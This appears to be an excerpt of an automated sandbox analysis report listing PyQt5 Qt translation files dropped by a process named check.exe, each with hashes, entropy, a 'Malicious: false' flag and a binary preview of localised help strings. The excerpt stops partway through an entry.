Size (bytes):	10612
Entropy (8bit):	4.458970627057882
Encrypted:	false
SSDEEP:	192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
MD5:	3639B57B463987F6DB07629253ACD8BF
SHA1:	65935A67C73F19FCF6023FB95030A5ACAF9DA21C
SHA-256:	316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
SHA-512:	AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7917
Entropy (8bit):	5.680408580146589
Encrypted:	false
SSDEEP:	192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
MD5:	1380A9352C476071BDA5A5D4FED0B6C5
SHA1:	9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
SHA-256:	AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
SHA-512:	EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....\|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	5708
Entropy (8bit):	5.698914195742074
Encrypted:	false
SSDEEP:	96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
MD5:	CD15674A652C2BF435F7578E119182F8
SHA1:	AEA22E4A0D21396733802C7AB738DDD03737B7D6
SHA-256:	F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
SHA-512:	88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....\|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...\|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...\|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...\|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9673
Entropy (8bit):	4.622652249027856
Encrypted:	false
SSDEEP:	192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
MD5:	2B68446B69D9AA40B273D75A581D2992
SHA1:	8A09BD38998543B74E2673478EDD54FB4BBDD068
SHA-256:	CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
SHA-512:	F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.\|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_ru.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7288
Entropy (8bit):	5.297177914619657
Encrypted:	false
SSDEEP:	192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
MD5:	794AF445A5D7082D51BD22683449F86D
SHA1:	3A0C369872B112A1572AA17EEB814B168B225D98
SHA-256:	557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
SHA-512:	D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_sk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	4.70568613551943
Encrypted:	false
SSDEEP:	192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
MD5:	75C94E59F1FC5312AE25381C247AF992
SHA1:	E3E5F4582CC5FAFE6DF43644D11484861023C084
SHA-256:	F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
SHA-512:	959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_sl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10363
Entropy (8bit):	4.613473842638716
Encrypted:	false
SSDEEP:	192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
MD5:	3B0AEE27B193A8A563C5CB5C7C4FE60F
SHA1:	C94E832595EC765370553468F87C02DB7E7D138A
SHA-256:	2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
SHA-512:	EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_tr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.68793836539357
Encrypted:	false
SSDEEP:	96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
MD5:	32D6EE3D8EE6408A03E568B972F93BCB
SHA1:	582EE079DBD42000C378E0701D26405750524DBA
SHA-256:	EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
SHA-512:	24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_uk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9750
Entropy (8bit):	5.281035122342072
Encrypted:	false
SSDEEP:	192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
MD5:	90A776917D534B65942063C319573CDC
SHA1:	5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
SHA-256:	497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
SHA-512:	B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_zh_CN.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	6441
Entropy (8bit):	5.790303416386852
Encrypted:	false
SSDEEP:	192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
MD5:	9297A6905B8B1823BF7E318D9138A104
SHA1:	3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
SHA-256:	C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
SHA-512:	01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_zh_TW.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.80411750798786
Encrypted:	false
SSDEEP:	192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
MD5:	47C3328D3918CF627112BB6C50E30B86
SHA1:	05705603AB3F28402A6C103E1C41DDFF21D140C0
SHA-256:	3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
SHA-512:	8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.6255640074603277
Encrypted:	false
SSDEEP:	3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
MD5:	5A46979B45C67DD6312F33CCEA2ED7BC
SHA1:	4C56836B1FB10D9903B299CBCB925947D515B4C8
SHA-256:	BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
SHA-512:	BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.5752972123113778
Encrypted:	false
SSDEEP:	3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
MD5:	2BB8C94D420D3BC344C79A01043BDC89
SHA1:	3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
SHA-256:	9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
SHA-512:	C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.599979504080125
Encrypted:	false
SSDEEP:	3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
MD5:	8A1EE3433304838CCD0EBE0A825E84D8
SHA1:	2B3476588350C5384E0F9A51FF2E3659E89B4846
SHA-256:	23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
SHA-512:	2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.652277257665055
Encrypted:	false
SSDEEP:	3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
MD5:	7B2659AF52B824EAC6C169CDD9467EE9
SHA1:	5727109218B222E3B654A8CC9933E970EB7C2118
SHA-256:	4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
SHA-512:	E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_lt.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	165383
Entropy (8bit):	4.805977227348512
Encrypted:	false
SSDEEP:	1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
MD5:	8992B652D1499F5D2F12674F3F875A35
SHA1:	E22766A49612F79156C550D83C6C230345DDA433
SHA-256:	47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
SHA-512:	9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ltB..0X.....)C...+...\|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E......................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...\|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_lv.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	89
Entropy (8bit):	4.156834975253888
Encrypted:	false
SSDEEP:	3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
MD5:	19F1B919BB531E9E12E7F707BEBD8497
SHA1:	46E82683CEA28D877C73A5CE02F965BB1130FC62
SHA-256:	03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
SHA-512:	901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	161
Entropy (8bit):	3.8693516202048612
Encrypted:	false
SSDEEP:	3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
MD5:	D71EA9FEFD97464B178235150EC8759E
SHA1:	61026FE602FD1B8B442A0D341C6BD759EEC75488
SHA-256:	BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
SHA-512:	ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_pt.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	70334
Entropy (8bit):	4.732724622610353
Encrypted:	false
SSDEEP:	768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
MD5:	6656500F7A28EF820AE9F97FD47FB5BB
SHA1:	CC112B9C9513BCF7497F3417168B4C8A9F7640A9
SHA-256:	2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
